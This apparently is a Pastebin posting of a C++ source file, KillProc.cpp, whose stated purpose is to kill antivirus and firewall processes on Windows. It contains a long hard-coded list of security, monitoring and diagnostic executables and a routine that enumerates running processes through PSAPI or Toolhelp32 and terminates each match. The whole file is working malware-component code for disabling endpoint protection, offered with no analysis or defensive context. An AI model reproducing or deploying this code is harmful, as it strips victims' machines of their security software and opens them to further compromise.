Advertisement
FlyFar

KillProc.cpp

Mar 26th, 2024
575
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 10.71 KB | Cybersecurity | 0 0
  1. /**************************************
  2. * Kills Antivirus and Firewall associated
  3. * processes.
  4. * Uses basic windows APIs from tlhelp32
  5. * such as: CreateToolhelp32Snapshot
  6. *
  7. *
  8. **************************************/
  9.  
  10. #define WIN32_LEAN_AND_MEAN
  11. #include <windows.h>
  12. #include <tlhelp32.h>
  13.  #include <lm.h>
  14.  
  15. int KillProcess(const char *);
  16.  
  17. int endAvSoft()
  18. {
  19.     const char *exelst[] = { "AGENTSVR.EXE", "ANTI-TROJAN.EXE","ANTIVIRUS.EXE","ANTS.EXE","APIMONITOR.EXE","APLICA32.EXE","APVXDWIN.EXE","ATCON.EXE","ATGUARD.EXE","ATRO55EN.EXE","ATUPDATER.EXE","ATWATCH.EXE","AUPDATE.EXE","AUTODOWN.EXE","AUTOTRACE.EXE","AUTOUPDATE.EXE","AVCONSOL.EXE","AVGSERV9.EXE","AVLTMAIN.EXE","AVPUPD.EXE","AVSYNMGR.EXE","AVWUPD32.EXE","AVXQUAR.EXE","AVprotect9x.exe","Au.exe","BD_PROFESSIONAL.EXE","BIDEF.EXE","BIDSERVER.EXE","BIPCP.EXE","BIPCPEVALSETUP.EXE","BISP.EXE","BLACKD.EXE","BLACKICE.EXE","BOOTWARN.EXE","BORG2.EXE","BS120.EXE","CDP.EXE","CFGWIZ.EXE","CFIADMIN.EXE","CFIAUDIT.EXE","CFINET.EXE","CFINET32.EXE","CLEAN.EXE","CLEANER.EXE","CLEANER3.EXE","CLEANPC.EXE","CMGRDIAN.EXE","CMON016.EXE",
  20. "CPD.EXE","CPF9X206.EXE","CPFNT206.EXE","CV.EXE","CWNB181.EXE","CWNTDWMO.EXE","D3dupdate.exe","DEFWATCH.EXE","DEPUTY.EXE","DPF.EXE","DPFSETUP.EXE","DRWATSON.EXE","DRWEBUPW.EXE","ENT.EXE","ESCANH95.EXE","ESCANHNT.EXE","ESCANV95.EXE","EXANTIVIRUS-CNET.EXE","FAST.EXE","FIREWALL.EXE","FLOWPROTECTOR.EXE","FP-WIN_TRIAL.EXE","FRW.EXE","FSAV.EXE","FSAV530STBYB.EXE","FSAV530WTBYB.EXE","FSAV95.EXE","GBMENU.EXE","GBPOLL.EXE","GUARD.EXE","HACKTRACERSETUP.EXE","HTLOG.EXE","HWPE.EXE","IAMAPP.EXE","IAMAPP.EXE","IAMSERV.EXE","ICLOAD95.EXE","ICLOADNT.EXE","ICMON.EXE","ICSSUPPNT.EXE","ICSUPP95.EXE","ICSUPPNT.EXE","IFW2000.EXE","IPARMOR.EXE","IRIS.EXE","JAMMER.EXE","KAVLITE40ENG.EXE",
  21. "KAVPERS40ENG.EXE","KERIO-PF-213-EN-WIN.EXE","KERIO-WRL-421-EN-WIN.EXE","KERIO-WRP-421-EN-WIN.EXE","KILLPROCESSSETUP161.EXE","LDPRO.EXE","LOCALNET.EXE","LOCKDOWN.EXE","LOCKDOWN2000.EXE","LSETUP.EXE","LUALL.EXE","LUCOMSERVER.EXE","LUINIT.EXE","MCAGENT.EXE","MCUPDATE.EXE","MFW2EN.EXE","MFWENG3.02D30.EXE","MGUI.EXE","MINILOG.EXE","MOOLIVE.EXE","MRFLUX.EXE","MSCONFIG.EXE","MSINFO32.EXE","MSSMMC32.EXE","MU0311AD.EXE","NAV80TRY.EXE","NAVAPW32.EXE","NAVDX.EXE","NAVSTUB.EXE","NAVW32.EXE","NC2000.EXE","NCINST4.EXE","NDD32.EXE","NEOMONITOR.EXE","NETARMOR.EXE","NETINFO.EXE","NETMON.EXE","NETSCANPRO.EXE","NETSPYHUNTER-1.2.EXE","NETSTAT.EXE","NISSERV.EXE","NISUM.EXE","NMAIN.EXE","NORTON_INTERNET_SECU_3.0_407.EXE",
  22. "NPF40_TW_98_NT_ME_2K.EXE","NPFMESSENGER.EXE","NPROTECT.EXE","NSCHED32.EXE","NTVDM.EXE","NUPGRADE.EXE","NVARCH16.EXE","NWINST4.EXE","NWTOOL16.EXE","OSTRONET.EXE","OUTPOST.EXE","OUTPOSTINSTALL.EXE","OUTPOSTPROINSTALL.EXE","PADMIN.EXE","PANIXK.EXE","PAVPROXY.EXE","PCC2002S902.EXE","PCC2K_76_1436.EXE","PCCIOMON.EXE","PCDSETUP.EXE","PCFWALLICON.EXE","PCIP10117_0.EXE","PDSETUP.EXE","PERISCOPE.EXE","PERSFW.EXE","PF2.EXE","PFWADMIN.EXE","PINGSCAN.EXE","PLATIN.EXE","POPROXY.EXE","POPSCAN.EXE","PORTDETECTIVE.EXE","PPINUPDT.EXE","PPTBC.EXE","PPVSTOP.EXE","PROCEXPLORERV1.0.EXE","PROPORT.EXE","PROTECTX.EXE","PSPF.EXE","PURGE.EXE","PVIEW95.EXE","QCONSOLE.EXE","QSERVER.EXE","RAV8WIN32ENG.EXE","RESCUE.EXE","RESCUE32.EXE",
  23. "RRGUARD.EXE","RSHELL.EXE","RTVSCN95.EXE",
  24. "RULAUNCH.EXE","SAFEWEB.EXE","SBSERV.EXE","SD.EXE","SETUPVAMEEVAL.EXE","SETUP_FLOWPROTECTOR_US.EXE","SFC.EXE","SGSSFW32.EXE","avserve2.exe","SHELLSPYINSTALL.EXE","SHN.EXE","SMC.EXE","SOFI.EXE","SPF.EXE","SPHINX.EXE","SPYXX.EXE","SS3EDIT.EXE","ST2.EXE","SUPFTRL.EXE","SUPPORTER5.EXE","SYMPROXYSVC.EXE","SYSEDIT.EXE","TASKMON.EXE","TAUMON.EXE","TAUSCAN.EXE","TC.EXE","TCA.EXE","TCM.EXE","TDS-3.EXE","TDS2-98.EXE","TDS2-NT.EXE","TFAK5.EXE","TGBOB.EXE","TITANIN.EXE","TITANINXP.EXE","TRACERT.EXE","TRJSCAN.EXE","TRJSETUP.EXE","TROJANTRAP3.EXE","UNDOBOOT.EXE","UPDATE.EXE","VBCMSERV.EXE","VBCONS.EXE","VBUST.EXE","VBWIN9X.EXE","VBWINNTW.EXE",
  25. "VCSETUP.EXE","VFSETUP.EXE","VIRUSMDPERSONALFIREWALL.EXE","VNLAN300.EXE","VNPC3000.EXE","VPC42.EXE","VPFW30S.EXE","VPTRAY.EXE","VSCENU6.02D30.EXE","VSECOMR.EXE","VSHWIN32.EXE","VSISETUP.EXE","VSMAIN.EXE","VSMON.EXE","VSSTAT.EXE","VSWIN9XE.EXE","VSWINNTSE.EXE","VSWINPERSE.EXE","W32DSM89.EXE","W9X.EXE","WATCHDOG.EXE","WEBSCANX.EXE","WGFE95.EXE","WHOSWATCHINGME.EXE","WINRECON.EXE","WNT.EXE","WRADMIN.EXE","WRCTRL.EXE","WSBGATE.EXE","WYVERNWORKSFIREWALL.EXE","XPF202EN.EXE","ZAPRO.EXE","ZAPSETUP3001.EXE","ZATUTOR.EXE","ZAUINST.EXE","ZONALM2601.EXE","ZONEALARM.EXE","CCAPP.exe", 0 };
  26.  
  27.  
  28.                        
  29. register int m;
  30.  
  31.     for (m=0; exelst[m]; m++)
  32.  
  33.  KillProcess(exelst[m]);
  34.    
  35.  
  36.    
  37.     return 0;
  38. }
  39.  
  40. int KillProcess(const char *szToTerminate)
  41.  
  42. {
  43.     BOOL bResult,bResultm;
  44.     DWORD aiPID[1000],iCb=1000,iNumProc,iV2000=0;
  45.     DWORD iCbneeded,i,iFound=0;
  46.     char szName[MAX_PATH],szToTermUpper[MAX_PATH];
  47.     HANDLE hProc,hSnapShot,hSnapShotm;
  48.     OSVERSIONINFO osvi;
  49.     HINSTANCE hInstLib;
  50.     int iLen,iLenP,indx;
  51.     HMODULE hMod;
  52.     PROCESSENTRY32 procentry;      
  53.     MODULEENTRY32 modentry;
  54.     iLenP=strlen(szToTerminate);
  55.     if(iLenP<1 || iLenP>MAX_PATH) return 632;
  56.     for(indx=0;indx<iLenP;indx++)
  57.         szToTermUpper[indx]=toupper(szToTerminate[indx]);
  58.     szToTermUpper[iLenP]=0;
  59.      BOOL (WINAPI *lpfEnumProcesses)( DWORD *, DWORD cb, DWORD * );
  60.      BOOL (WINAPI *lpfEnumProcessModules)( HANDLE, HMODULE *,
  61.         DWORD, LPDWORD );
  62.      DWORD (WINAPI *lpfGetModuleBaseName)( HANDLE, HMODULE,
  63.         LPTSTR, DWORD );
  64.       HANDLE (WINAPI *lpfCreateToolhelp32Snapshot)(DWORD,DWORD) ;
  65.       BOOL (WINAPI *lpfProcess32First)(HANDLE,LPPROCESSENTRY32) ;
  66.       BOOL (WINAPI *lpfProcess32Next)(HANDLE,LPPROCESSENTRY32) ;
  67.       BOOL (WINAPI *lpfModule32First)(HANDLE,LPMODULEENTRY32) ;
  68.       BOOL (WINAPI *lpfModule32Next)(HANDLE,LPMODULEENTRY32) ;
  69.     osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  70.     bResult=GetVersionEx(&osvi);
  71.     if(!bResult)  
  72.         return 606;
  73.     if((osvi.dwPlatformId != VER_PLATFORM_WIN32_NT) &&
  74.         (osvi.dwPlatformId != VER_PLATFORM_WIN32_WINDOWS))
  75.         return 607;
  76.  
  77.     if(osvi.dwPlatformId==VER_PLATFORM_WIN32_NT)
  78.     {  
  79.          hInstLib = LoadLibraryA("PSAPI.DLL");
  80.          if(hInstLib == NULL)
  81.             return 605;
  82.  
  83.        
  84.          lpfEnumProcesses = (BOOL(WINAPI *)(DWORD *,DWORD,DWORD*))
  85.             GetProcAddress( hInstLib, "EnumProcesses" ) ;
  86.          lpfEnumProcessModules = (BOOL(WINAPI *)(HANDLE, HMODULE *,
  87.             DWORD, LPDWORD)) GetProcAddress( hInstLib,
  88.             "EnumProcessModules" ) ;
  89.          lpfGetModuleBaseName =(DWORD (WINAPI *)(HANDLE, HMODULE,
  90.             LPTSTR, DWORD )) GetProcAddress( hInstLib,
  91.             "GetModuleBaseNameA" ) ;
  92.  
  93.          if(lpfEnumProcesses == NULL ||
  94.             lpfEnumProcessModules == NULL ||
  95.             lpfGetModuleBaseName == NULL)
  96.             {
  97.                FreeLibrary(hInstLib);
  98.                return 700;
  99.             }
  100.          
  101.         bResult=lpfEnumProcesses(aiPID,iCb,&iCbneeded);
  102.         if(!bResult)
  103.         {
  104.             FreeLibrary(hInstLib);
  105.             return 701;
  106.         }
  107.  
  108.  
  109.         iNumProc=iCbneeded/sizeof(DWORD);
  110.  
  111.        
  112.         for(i=0;i<iNumProc;i++)
  113.         {
  114.             strcpy(szName,"Unknown");
  115.             hProc=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ,FALSE,
  116.                 aiPID[i]);
  117.             if(hProc)
  118.             {
  119.                if(lpfEnumProcessModules(hProc,&hMod,sizeof(hMod),&iCbneeded) )
  120.                {
  121.                   iLen=lpfGetModuleBaseName(hProc,hMod,szName,MAX_PATH);
  122.                }
  123.             }
  124.             CloseHandle(hProc);
  125.  
  126.             if(strcmp(strupr(szName),szToTermUpper)==0)
  127.  
  128.             if(strcmp(_strupr(szName),szToTermUpper)==0)
  129.  
  130.             {
  131.                 iFound=1;
  132.                 hProc=OpenProcess(PROCESS_TERMINATE,FALSE,aiPID[i]);
  133.                 if(hProc)
  134.                 {
  135.                     if(TerminateProcess(hProc,0))
  136.                     {
  137.                         CloseHandle(hProc);
  138.                         FreeLibrary(hInstLib);
  139.                         return 0;
  140.                     }
  141.                     else
  142.                     {
  143.                         CloseHandle(hProc);
  144.                         FreeLibrary(hInstLib);
  145.                         return 602;
  146.                     }
  147.                 }
  148.                 else
  149.                 {
  150.                     FreeLibrary(hInstLib);
  151.                     return 604;
  152.                 }
  153.             }
  154.         }
  155.     }
  156.  
  157.     if(osvi.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS)
  158.     {
  159.        
  160.            
  161.         hInstLib = LoadLibraryA("Kernel32.DLL");
  162.         if( hInstLib == NULL )
  163.             return 702;
  164.  
  165.        
  166.         lpfCreateToolhelp32Snapshot=
  167.             (HANDLE(WINAPI *)(DWORD,DWORD))
  168.             GetProcAddress( hInstLib,
  169.             "CreateToolhelp32Snapshot" ) ;
  170.         lpfProcess32First=
  171.             (BOOL(WINAPI *)(HANDLE,LPPROCESSENTRY32))
  172.             GetProcAddress( hInstLib, "Process32First" ) ;
  173.         lpfProcess32Next=
  174.             (BOOL(WINAPI *)(HANDLE,LPPROCESSENTRY32))
  175.             GetProcAddress( hInstLib, "Process32Next" ) ;
  176.         lpfModule32First=
  177.             (BOOL(WINAPI *)(HANDLE,LPMODULEENTRY32))
  178.             GetProcAddress( hInstLib, "Module32First" ) ;
  179.         lpfModule32Next=
  180.             (BOOL(WINAPI *)(HANDLE,LPMODULEENTRY32))
  181.             GetProcAddress( hInstLib, "Module32Next" ) ;
  182.         if( lpfProcess32Next == NULL ||
  183.             lpfProcess32First == NULL ||
  184.             lpfModule32Next == NULL ||
  185.             lpfModule32First == NULL ||
  186.             lpfCreateToolhelp32Snapshot == NULL )
  187.         {
  188.             FreeLibrary(hInstLib);
  189.             return 703;
  190.         }
  191.            
  192.        
  193.  
  194.         hSnapShot = lpfCreateToolhelp32Snapshot(
  195.             TH32CS_SNAPPROCESS, 0 ) ;
  196.         if( hSnapShot == INVALID_HANDLE_VALUE )
  197.         {
  198.             FreeLibrary(hInstLib);
  199.             return 704;
  200.         }
  201.        
  202.        
  203.         procentry.dwSize = sizeof(PROCESSENTRY32);
  204.         bResult=lpfProcess32First(hSnapShot,&procentry);
  205.  
  206.        
  207.         while(bResult)
  208.         {
  209.            
  210.             hSnapShotm = lpfCreateToolhelp32Snapshot(
  211.                 TH32CS_SNAPMODULE, procentry.th32ProcessID) ;
  212.             if( hSnapShotm == INVALID_HANDLE_VALUE )
  213.             {
  214.                 CloseHandle(hSnapShot);
  215.                 FreeLibrary(hInstLib);
  216.                 return 704;
  217.             }
  218.            
  219.             modentry.dwSize=sizeof(MODULEENTRY32);
  220.             bResultm=lpfModule32First(hSnapShotm,&modentry);
  221.  
  222.            
  223.             while(bResultm)
  224.             {
  225.                 if(strcmp(modentry.szModule,szToTermUpper)==0)
  226.                 {
  227.                    
  228.                     iFound=1;
  229.                    
  230.                     hProc=OpenProcess(PROCESS_TERMINATE,FALSE,procentry.th32ProcessID);
  231.                     if(hProc)
  232.                     {
  233.                         if(TerminateProcess(hProc,0))
  234.                         {
  235.                            
  236.                             CloseHandle(hSnapShotm);
  237.                             CloseHandle(hSnapShot);
  238.                             CloseHandle(hProc);
  239.                             FreeLibrary(hInstLib);
  240.                             return 0;
  241.                         }
  242.                         else
  243.                         {
  244.                            
  245.                             CloseHandle(hSnapShotm);
  246.                             CloseHandle(hSnapShot);
  247.                             CloseHandle(hProc);
  248.                             FreeLibrary(hInstLib);
  249.                             return 602;
  250.                         }
  251.                     }
  252.                     else
  253.                     {
  254.                        
  255.                         CloseHandle(hSnapShotm);
  256.                         CloseHandle(hSnapShot);
  257.                         FreeLibrary(hInstLib);
  258.                         return 604;
  259.                     }
  260.                 }
  261.                 else
  262.                 {  
  263.                     modentry.dwSize=sizeof(MODULEENTRY32);
  264.                     bResultm=lpfModule32Next(hSnapShotm,&modentry);
  265.                 }
  266.             }
  267.  
  268.            
  269.             CloseHandle(hSnapShotm);
  270.             procentry.dwSize = sizeof(PROCESSENTRY32);
  271.             bResult = lpfProcess32Next(hSnapShot,&procentry);
  272.         }
  273.         CloseHandle(hSnapShot);
  274.     }
  275.     if(iFound==0)
  276.     {
  277.         FreeLibrary(hInstLib);
  278.         return 603;
  279.     }
  280.     FreeLibrary(hInstLib);
  281.     return 0;
  282. }
  283.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement